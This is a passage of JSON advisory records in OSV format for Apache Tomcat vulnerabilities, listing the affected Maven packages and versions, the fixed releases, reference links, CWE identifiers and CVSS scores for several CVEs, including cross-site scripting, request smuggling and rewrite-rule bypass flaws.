"https://github.com/apache/tomcat/commit/fbd81421629afe8b8a3922d59020cde81caea861" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/7wvxonzwb7k9hx9jt3q33cmy7j97jo3j" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202305-37" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230616-0004" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5521" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/05/22/1" } ], "database_specific": { "cwe_ids": [ "CWE-193" ], "github_reviewed": true, "github_reviewed_at": "2023-07-06T23:34:50Z", "nvd_published_at": "2023-05-22T11:15:09Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f4qf-m5gf-8jm8", "published": "2024-01-19T12:30:18Z", "modified": "2025-11-03T23:02:07.816346Z", "aliases": [ "BIT-tomcat-2024-21733", "CVE-2024-21733" ], "summary": "Apache Tomcat vulnerable to Generation of Error Message Containing Sensitive Information", "details": "Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43.\n\nUsers are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M11" }, { "fixed": "9.0.44" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-f4qf-m5gf-8jm8/GHSA-f4qf-m5gf-8jm8.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.7" }, { "fixed": "8.5.64" } ] } ], "versions": [ "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.60", "8.5.61", "8.5.63", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-f4qf-m5gf-8jm8/GHSA-f4qf-m5gf-8jm8.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21733" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/86ccc43940861703c2be96a5f35384407522125a" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/ce4b154e7b48f66bd98858626347747cd2514311" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240216-0005" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/176951/Apache-Tomcat-8.5.63-9.0.43-HTTP-Response-Smuggling.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/01/19/2" } ], "database_specific": { "cwe_ids": [ "CWE-209" ], "github_reviewed": true, "github_reviewed_at": "2024-01-29T22:30:43Z", "nvd_published_at": "2024-01-19T11:15:08Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f98p-9pp6-7q6c", "published": "2022-05-01T23:45:13Z", "modified": "2025-04-09T16:44:52Z", "aliases": [ "CVE-2008-1947" ], "summary": "Apache Tomcat Cross-site scripting (XSS) vulnerability", "details": "Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to `host-manager/html/add`.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "5.5.9" }, { "fixed": "5.5.27" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 5.5.26", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-f98p-9pp6-7q6c/GHSA-f98p-9pp6-7q6c.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.0.18" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 6.0.16", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-f98p-9pp6-7q6c/GHSA-f98p-9pp6-7q6c.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "5.5.9" }, { "fixed": "5.5.27" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 5.5.26", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-f98p-9pp6-7q6c/GHSA-f98p-9pp6-7q6c.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.0.18" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 6.0.16", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-f98p-9pp6-7q6c/GHSA-f98p-9pp6-7q6c.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2008-1947" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/ab6a6c41ac972c845717c9d639f0335865afab4d" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/78ad0fcbe29c824f1f2e45a4e2716247b033250a" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/49c71fc59c1b8f8da77aea9eb53e61db168aebab" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/5f00d434c8dc11bd49ce0b4b56fe889839056030" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3aacc40356defc3f248aa504b1e48e819dd0471a0a83349080c6bcbf%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3aacc40356defc3f248aa504b1e48e819dd0471a0a83349080c6bcbf@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r584a714f141eff7b1c358d4679288177bd4ca4558e9999d15867d4b5%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r584a714f141eff7b1c358d4679288177bd4ca4558e9999d15867d4b5@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apple.com/archives/security-announce/2008/Oct/msg00001.html" }, { "type": "WEB", "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11534" }, { "type": "WEB", "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6009" }, { "type": "WEB", "url": "https://web.archive.org/web/20200514224656/http://www.securityfocus.com/archive/1/507985/100/0/threaded" }, { "type": "WEB", "url": "https://web.archive.org/web/20201208011750/http://www.securityfocus.com/archive/1/492958/100/0/threaded" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg00712.html" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg00859.html" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg00889.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8dcaf7c3894d66cb717646ea1504ea6e300021c85bb4e677dc16b1aa@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8dcaf7c3894d66cb717646ea1504ea6e300021c85bb4e677dc16b1aa%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/06cfb634bc7bf37af7d8f760f118018746ad8efbd519c4b789ac9c2e@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/06cfb634bc7bf37af7d8f760f118018746ad8efbd519c4b789ac9c2e%40%3Cdev.tomcat.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/42816" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=446393" }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2008-1947" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2008:1007" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2008:0864" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2008:0862" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2008:0648" }, { "type": "WEB", "url": "http://lists.apple.com/archives/security-announce/2008/Oct/msg00001.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2008-07/msg00001.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html" }, { "type": "WEB", "url": "http://marc.info/?l=bugtraq\u0026m=123376588623823\u0026w=2" }, { "type": "WEB", "url": "http://marc.info/?l=bugtraq\u0026m=139344343412337\u0026w=2" }, { "type": "WEB", "url": "http://marc.info/?l=tomcat-user\u0026m=121244319501278\u0026w=2" }, { "type": "WEB", "url": "http://support.apple.com/kb/HT3216" }, { "type": "WEB", "url": "http://support.avaya.com/elmodocs2/security/ASA-2008-401.htm" }, { "type": "WEB", "url": "http://tomcat.apache.org/security-5.html" }, { "type": "WEB", "url": "http://tomcat.apache.org/security-6.html" }, { "type": "WEB", "url": "http://www.debian.org/security/2008/dsa-1593" }, { "type": "WEB", "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2008:188" }, { "type": "WEB", "url": "http://www.redhat.com/support/errata/RHSA-2008-0648.html" }, { "type": "WEB", "url": "http://www.redhat.com/support/errata/RHSA-2008-0862.html" }, { "type": "WEB", "url": "http://www.redhat.com/support/errata/RHSA-2008-0864.html" }, { "type": "WEB", "url": "http://www.vmware.com/security/advisories/VMSA-2009-0002.html" }, { "type": "WEB", "url": "http://www.vmware.com/security/advisories/VMSA-2009-0016.html" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2024-01-08T22:33:18Z", "nvd_published_at": "2008-06-04T19:32:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-fccv-jmmp-qg76", "published": "2023-11-28T18:30:23Z", "modified": "2025-08-08T19:09:25.636121Z", "aliases": [ "BIT-tomcat-2023-46589", "CVE-2023-46589" ], "related": [ "CGA-3336-vxcr-qh26", "CGA-x5p2-8fvm-5gv3" ], "summary": "Apache Tomcat Improper Input Validation vulnerability", "details": "Improper Input Validation vulnerability in Apache Tomcat. Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82, and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. A trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy. Older, EOL versions may also be affected.\n\nUsers are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M11" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-fccv-jmmp-qg76/GHSA-fccv-jmmp-qg76.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.16" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-fccv-jmmp-qg76/GHSA-fccv-jmmp-qg76.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.83" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-fccv-jmmp-qg76/GHSA-fccv-jmmp-qg76.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.96" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-fccv-jmmp-qg76/GHSA-fccv-jmmp-qg76.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M11" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-fccv-jmmp-qg76/GHSA-fccv-jmmp-qg76.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.16" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-fccv-jmmp-qg76/GHSA-fccv-jmmp-qg76.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.83" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-fccv-jmmp-qg76/GHSA-fccv-jmmp-qg76.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.96" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-fccv-jmmp-qg76/GHSA-fccv-jmmp-qg76.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46589" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/6f181e1062a472bc5f0234980f66cbde42c1041b" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/7a2d8818fcea0b51747a67af9510ce7977245ebd" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/aa92971e879a519384c517febc39fd04c48d4642" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/b5776d769bffeade865061bc8ecbeb2b56167b08" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/0rqq6ktozqc42ro8hhxdmmdjm1k1tpxr" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00001.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231214-0009" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "https://www.openwall.com/lists/oss-security/2023/11/28/2" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/11/28/2" } ], "database_specific": { "cwe_ids": [ "CWE-20", "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2023-11-28T23:28:54Z", "nvd_published_at": "2023-11-28T16:15:06Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-ff77-26x5-69cr", "published": "2025-04-28T21:30:43Z", "modified": "2025-11-03T23:15:57.588860Z", "aliases": [ "BIT-tomcat-2025-31651", "CVE-2025-31651" ], "related": [ "CGA-576p-jvpw-wc6p", "CGA-mm2j-x7m9-9wg3" ], "summary": "Apache Tomcat Rewrite rule bypass", "details": "Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache Tomcat. For a subset of unlikely rewrite rule configurations, it was possible for a specially crafted request to bypass some rewrite rules. If those rewrite rules effectively enforced security constraints, those constraints could be bypassed.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.5, from 10.1.0-M1 through 10.1.39, from 9.0.0.M1 through 9.0.102. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. Other, older, EOL versions may also be affected.\n\nUsers are recommended to upgrade to version 9.0.104, 10.1.40 or 11.0.6, which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.76" }, { "fixed": "9.0.104" } ] } ], "versions": [ "9.0.100", "9.0.102", "9.0.76", "9.0.78", "9.0.79", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.102", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-ff77-26x5-69cr/GHSA-ff77-26x5-69cr.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.10" }, { "fixed": "10.1.40" } ] } ], "versions": [ "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-ff77-26x5-69cr/GHSA-ff77-26x5-69cr.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M2" }, { "fixed": "11.0.6" } ] } ], "versions": [ "11.0.0", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-ff77-26x5-69cr/GHSA-ff77-26x5-69cr.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.76" }, { "fixed": "9.0.104" } ] } ], "versions": [ "9.0.100", "9.0.102", "9.0.76", "9.0.78", "9.0.79", "9.0.80", "9.0.81", "9.0.82", 